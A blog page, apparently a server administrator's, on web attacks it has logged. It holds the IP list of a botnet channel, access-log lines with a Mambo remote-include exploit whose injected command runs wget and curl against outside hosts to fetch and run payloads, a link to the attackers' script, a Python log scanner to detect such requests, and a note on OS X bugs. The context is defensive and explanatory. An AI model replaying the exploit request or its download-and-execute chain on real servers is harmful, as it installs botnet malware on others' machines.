#mambolizo XPMIJ H ~RCXMIP@67.53.244.228 (KJLM)
#mambolizo XQIQR H ~JZWRVZW@206.33.2.132 (OHAY)
#mambolizo XTDWV H ~SFHVQA@203.55.23.201 (KYQPKBJ)
#mambolizo XTDWV H ~SFHVQA@203.55.23.51 (KYQPKBJ)
#mambolizo XVADU H ~SPJR@217.206.217.199 (SMMXING)
#mambolizo XXVOR H ~MEUVLICC@194.106.17.163 (KGOZT)
#mambolizo YBHDN H ~ANSRK@69.60.124.43 (PCMT)
#mambolizo YCWVOQS H ~VAHAR@213.225.48.85 (YEAQJL)
#mambolizo YDRBQVP H ~KHHGR@202.71.143.2 (EKJRWSD)
#mambolizo YEYMEGHV H ~LCQYVW@84.149.127.173 (JJDB)
#mambolizo YEYMEGHV H ~LCQYVW@84.149.95.234 (JJDB)
#mambolizo YFADXOXO H ~RIRY@82.226.118.139 (FOBA)
#mambolizo YGTGW H ~GJAX@80.32.194.218 (LKIWEUOI)
#mambolizo YKBEJBR H ~NWCK@203.219.147.14 (WDQHWIYX)
#mambolizo YLBIVW H ~DHMM@84.255.202.157 (MIBEYIW)
#mambolizo YQTTOQGI H ~RGQNUXW@85.234.143.14 (AJFO)
#mambolizo YRODPMA H ~NSPLIXE@82.226.252.2 (UQVTRTFM)
#mambolizo YYNN H ~WJTKTGY@67.161.213.233 (JRXX)
#mambolizo ZJZYZNIZ H ~VMFIZB@66.77.26.70 (BJOETM)
#mambolizo ZMYJZRMN H ~SSTLZW@81.223.209.211 (RGAOYT)
#mambolizo ZNEV H ~LABU@202.143.162.98 (UEFA)
#mambolizo ZOIA H ~VMMHAW@151.1.140.34 (XGTEB)
#mambolizo ZXNLPD H ~SLIBKNS@82.146.17.37 (ROHJSIC)
#mambolizo ZZCHGQ H ~OUPNMIZQ@83.138.146.85 (DCEHMJE)

If you are on this list, format and reinstall now.

Interesting attacks on my web server

Still think that a firewall is enough to protect your web server? Port 80 to the rescue!
Through a combination of curl, wget and various shell commands, this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart, but something tells me that after all is said and done… you end up on some IRC server in Brazil. Call it a hunch.

130.227.55.243 - - [25/Apr/2006:10:08:10 -0700] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 1044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [25/Apr/2006:10:08:11 -0700] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 1044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
130.227.55.243 - - [25/Apr/2006:10:08:12 -0700] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 1044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Seclists.org also noticed this traffic back in March:

All of them, as we can see, are exploitation attempts to known bugged pages (like the newest Mambo bug, the old XMLRPC problem with old versions of Drupal, etc). I guess that they are getting a list of domain names and trying them out with those vulns, and I believe that they may already have some thousands of vuln machines in their hands. Such attacks might have been enhanced by using Google to guess which domains are using which CMS… for example, looking on Google for “A password and instructions will be sent to this e-mail address, so make sure it is accurate.” will return a bunch of Drupal websites (88,500 according to Google, even though we can see just the first 1000 ones).

This is just some advice for all admins that use those CMS: to keep, as always, your CMS updated (almost every two weeks there are new vulns disclosed), and also, check if you already got caught by that, if you’re running old software.

The most interesting comment here is the use of Google to hone the attacks. There is even a book on the market that talks about hacking with Google. One of the more novel methods was extracting credit card numbers. Before anyone wonders whether Google gets sued over the random crimes committed by others using Google, look no further.

More details found on a forum regarding the make-up of this rootkit:

another botnet irc client:
http://210.3.4.193/cmd.txt
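A pass over the access log is the cheapest way to find out whether this has already been tried against you, and the request above is a good test case. The following Python is an added example, not code from the post or from Mambo: it parses Apache combined-format lines, percent-decodes each query parameter, and flags values that hand a URL to a configuration parameter (the remote-include stage) or that chain a fetch tool behind semicolons (the dropper stage). The sample log holds the third request from the excerpt above plus a constructed benign request; LOG_RE and the function names are mine.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" format: client, identity, user, timestamp, request line,
# status, bytes, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A value that starts with a URL scheme is the remote-include stage; a
# ';'-joined chain that invokes a fetch tool is the dropper stage behind it.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
FETCH_TOOL = re.compile(r'\b(wget|curl|fetch|lynx)\b', re.IGNORECASE)

# Constructed sample: the third request from the log excerpt above, plus one
# ordinary request (192.0.2.10 is documentation address space) as a control.
SAMPLE_LOG = [
    '130.227.55.243 - - [25/Apr/2006:10:08:12 -0700] "GET /mambo/index2.php?'
    '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path='
    'http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;'
    'chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20'
    'http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" '
    '404 1044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '192.0.2.10 - - [25/Apr/2006:10:09:00 -0700] "GET /index.php?option=com_content&id=1 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_query(query):
    """Split a raw query string on '&' only (never on ';', which the payload
    uses as a shell separator) and percent-decode names and values."""
    pairs = []
    for piece in query.split("&"):
        if piece:
            name, _, value = piece.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def analyse_request(target):
    """Return (kind, parameter, decoded value) findings for one request target."""
    findings = []
    for name, value in parse_query(urlsplit(target).query):
        if REMOTE_SCHEME.match(value):
            findings.append(("remote_include", name, value))
        if ";" in value and FETCH_TOOL.search(value):
            findings.append(("command_chain", name, value))
    return findings


def scan_log(lines):
    """Parse each line and keep only those whose request carries a finding.
    The status code is kept: a 404 means the page was missing, not that the
    include failed, so it is still worth checking the host for /tmp artifacts."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_request(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "status": m.group("status"), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["status"])
        for kind, name, value in hit["findings"]:
            print("   ", kind, name, "=", value[:60])
```

Feed it the whole access log (one line per list entry) and triage by source address; the remote-include finding alone is enough to block, and the command-chain finding tells you which paths (/tmp, /var/tmp) and filenames to look for on the host.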

Latest on OS X research

Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X. It’s an interesting mixture of bugs, consisting mostly of heap overflows. This is scary for those who would like to think that their OS X machine is 100% safe from malware. The media doesn’t always help with alarmist reactions, and Apple doesn’t help much with its defensive posture. The truth, as is almost always the case, lies in the parallax of the two sources. OS X has received a lot more attention these days and thus more bugs have been found. While the technical underpinnings of OS X *are* in fact more solid than Windows, it doesn’t mean that the OS is “virus free” or “immune from hackers/crackers/etc”.